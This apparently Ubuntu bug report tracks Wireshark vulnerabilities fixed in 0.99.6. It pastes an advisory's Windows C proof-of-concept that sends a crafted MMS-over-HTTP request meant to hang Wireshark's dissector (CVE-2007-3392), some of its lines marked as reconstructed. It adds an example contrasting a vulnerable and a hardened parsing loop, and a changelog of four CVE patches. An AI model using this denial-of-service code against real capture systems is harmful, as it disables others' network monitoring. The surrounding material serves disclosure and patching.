WireShark versions prior to 0.99.6 vulnerability
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
wireshark (Ubuntu) | Fix Released | High | Stephan Rügamer |
Edgy | Fix Released | High | Stephan Rügamer |
Feisty | Fix Released | High | Stephan Rügamer |
Bug Description
Update WireShark in the repos to 0.99.6 or newer
pasted page from securiteam...
http://
Vulnerable Systems:
* WireShark versions prior to 0.99.6
Immune Systems:
* WireShark version 0.99.6
WireShark parsing an MMS message whose Content-Type is application/
Solution:
Update to WireShark version 0.99.6
Exploit:
//main.cpp
// Proof of concept as pasted from the advisory. Several lines were cut off in the
// pasted copy; the Winsock boilerplate below is reconstructed so the file builds,
// and every reconstructed line is marked as such. Windows only (links ws2_32).
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   // exit, atoi
#include <string.h>   // strcpy, strlen, memcpy, memset
#pragma comment(lib, "ws2_32")

char *http =
    "POST / HTTP/1.0\r\n"
    "Content-Type: application/\r\n";   // MIME subtype cut off in the pasted copy; the
                                         // full value is what makes Wireshark's HTTP
                                         // dissector hand the body to the MMS dissector
char *hoststr = "Host: %s:%d\r\n";
char *contentlenstr = "Content-Length: %d\r\n\r\n";

// MMS message body as posted (WSP-encoded headers followed by a multipart entry)
unsigned char mms[] =
{
    0x8c,0x80,
    0x98,0x7a,
    0x8d,0x92,
    0x97,0x31,
    0x84,0xa3,
    ///////
    0x01,//
    0x0f,//HeadersLen
    0x05,//DataLen
    0x00,//headlen <<<=== If this is 0x00, Wireshark crashes. The real value is the length of the following three lines of bytes, which is 0x0e
    ///
    0x83,0x85,//Utf-8
    0x7a,0x77,
    0x81,0xea,
    ///
    0x7a,0x77,
};

// Name and body of this helper were cut off in the pasted copy; the standard
// gethostbyname/socket/connect sequence is reconstructed here.
SOCKET connect_host(const char *h, int p)
{
    SOCKET sock;
    struct hostent *host;
    struct sockaddr_in saddr;

    if((host=gethostbyname(h))==NULL)
    {
        printf("resolv host %s error\n", h);
        exit(-1);
    }
    if((sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("create socket error\n");
        exit(-1);
    }
    memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
    saddr.sin_family = AF_INET;                                   // reconstructed
    saddr.sin_port = htons((unsigned short)p);                    // reconstructed
    memcpy(&saddr.sin_addr, host->h_addr, sizeof(saddr.sin_addr)); // reconstructed
    if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0)
    {
        printf("connect to host %s on port %d error\n", h, p);
        exit(-1);
    }
    return sock;
}

void socket_init()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);   // version argument reconstructed
}

int main(int argc, char **argv)
{
    SOCKET s;
    char sendbuf[1024];
    int len = 0;

    printf("Wireshark MMS dissector DoS PoC\n");   // banner text cut off in the pasted copy
    if(argc != 3)
    {
        printf("usage : %s <host> <port>\n", argv[0]);
        exit(-1);
    }
    socket_init();
    s = connect_host(argv[1], atoi(argv[2]));

    // Assemble the request: fixed headers, Host, Content-Length, then the raw MMS body.
    // The body length is sizeof(mms), so the capture carries exactly these bytes.
    strcpy(sendbuf, http);
    len += strlen(http);
    sprintf(sendbuf + len, hoststr, argv[1], atoi(argv[2]));
    len = strlen(sendbuf);
    sprintf(sendbuf + len, contentlenstr, (int)sizeof(mms));
    len = strlen(sendbuf);
    memcpy(sendbuf + len, mms, sizeof(mms));
    len += sizeof(mms);
    send(s, sendbuf, len, 0);
    printf("sent %d bytes\n", len);   // message text cut off in the pasted copy
    closesocket(s);
    WSACleanup();
    return 0;
}
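The PoC above relies on a single zero length byte (the one marked headlen in the byte array) to stall the dissector, and CVE-2007-3392 describes the result as an infinite loop. The following is an added example, not code from the advisory, from the PoC author, or from Wireshark's packet-mms.c: it uses a constructed length-prefixed element format (an assumption, loosely modelled on a WSP length-prefixed header) and walks it twice, once with the bug class that lets a zero length stall the offset and once hardened. The function names, the element format and the sample byte strings are all assumptions made for illustration.

```c
/* Added example, not Wireshark's packet-mms.c and not the PoC author's
 * code. It shows the bug class behind the PoC above: a dissector loop
 * that advances its offset by a length read from the packet, so a zero
 * length leaves the offset where it is and the loop never terminates.
 *
 * Element format (assumption, constructed for this example, loosely
 * modelled on a WSP length-prefixed header): one byte giving the element's
 * total length INCLUDING that byte, followed by total-1 bytes of value. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

enum { PARSE_MALFORMED = -1, PARSE_HUNG = -2 };

/* Constructed sample input: three well-formed elements ("ab", "c", empty). */
static const uint8_t GOOD_ENTRY[] = { 0x03, 'a', 'b', 0x02, 'c', 0x01 };

/* Constructed sample input modelled on the PoC: a valid element followed by
 * a zero length byte, the role played by the 0x00 headlen byte above. */
static const uint8_t POC_ENTRY[] = { 0x03, 'a', 'b', 0x00, 0x41 };

/* Vulnerable loop: returns the number of elements walked. 'budget' caps the
 * iterations only so the hang is observable here; a real dissector without
 * such a cap spins until the process is killed. */
int walk_vulnerable(const uint8_t *buf, size_t len, int budget)
{
    size_t off = 0;
    int count = 0;
    while (off < len) {
        uint8_t total;
        if (budget-- == 0)
            return PARSE_HUNG;
        total = buf[off];
        /* ... dissect value bytes buf[off+1 .. off+total-1] here ... */
        count++;
        off += total;      /* BUG: total == 0 leaves off unchanged forever */
    }
    return count;
}

/* Hardened loop: rejects a length that cannot advance the offset or that
 * runs past the buffer, and double-checks progress on every iteration. */
int walk_hardened(const uint8_t *buf, size_t len)
{
    size_t off = 0;
    int count = 0;
    while (off < len) {
        uint8_t total = buf[off];
        size_t next;
        if (total == 0)            /* zero length: cannot make progress */
            return PARSE_MALFORMED;
        if (total > len - off)     /* length overruns the buffer */
            return PARSE_MALFORMED;
        next = off + total;
        if (next <= off)           /* belt and braces: every iteration must advance */
            return PARSE_MALFORMED;
        count++;
        off = next;
    }
    return count;
}

int main(void)
{
    printf("vulnerable/good: %d elements\n",
           walk_vulnerable(GOOD_ENTRY, sizeof GOOD_ENTRY, 1000));
    printf("vulnerable/poc:  %d (PARSE_HUNG: budget exhausted, offset never moved)\n",
           walk_vulnerable(POC_ENTRY, sizeof POC_ENTRY, 1000));
    printf("hardened/good:   %d elements\n",
           walk_hardened(GOOD_ENTRY, sizeof GOOD_ENTRY));
    printf("hardened/poc:    %d (PARSE_MALFORMED: zero length rejected)\n",
           walk_hardened(POC_ENTRY, sizeof POC_ENTRY));
    return 0;
}
```

The progress check in the hardened loop is the generic fix for this class: whatever the wire format, a loop whose next offset is computed from attacker-controlled data must verify that the next offset is strictly greater than the current one and still inside the buffer, or a single crafted packet turns the analyst's own capture tool into the victim.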
Changed in wireshark:
importance: Undecided → High
Changed in wireshark:
status: Fix Committed → Fix Released
Well, this is only one of them.....
here is the complete list with fixes...I'm preparing some debdiffs from dapper to feisty. Gutsy is clean.
  * SECURITY UPDATE: wireshark has several vulnerabilities:
    + CVE-2007-3389: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service (crash) via a crafted chunked encoding in an HTTP
      response, possibly related to a zero-length payload.
    + CVE-2007-3390: Wireshark 0.99.5 and 0.10.x up to 0.10.14, when running
      on certain systems, allows remote attackers to cause a denial of service
      (crash) via crafted iSeries capture files that trigger a SIGTRAP.
    + CVE-2007-3392: Wireshark before 0.99.6 allows remote attackers to cause
      a denial of service via malformed (1) SSL or (2) MMS packets that trigger an
      infinite loop.
    + CVE-2007-3393: Off-by-one error in the DHCP/BOOTP dissector in Wireshark
      before 0.99.6 allows remote attackers to cause a denial of service (crash) via
      crafted DHCP-over-DOCSIS packets.
  * debian/patches/12_secu_0.99.6_r21034.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-http.c?view=log&pathrev=21034)
  * debian/patches/12_secu_0.99.6_r20990.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/wiretap/iseries.c?r1=19814&r2=20990&pathrev=20990)
  * debian/patches/12_secu_0.99.6_r21392.dpatch,
    12_secu_0.99.6_r21665.dpatch:
    - applied patches from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-ssl.c?r1=21650&r2=21665&pathrev=21665&view=patch)
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-mms.c?r1=21088&r2=21392&pathrev=21392&view=patch)
  * debian/patches/12_secu_0.99.6_r21947.dpatch:
    - applied patch from upstream
      (Link: http://anonsvn.wireshark.org/viewvc/viewvc.py/trunk/epan/dissectors/packet-bootp.c?r1=21924&r2=21947&pathrev=21947&view=patch)
  * References:
    CVE-2007-3389
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394
    CVE-2007-3390
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1415
    CVE-2007-3392
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1342
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1582
    CVE-2007-3393
    http://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1416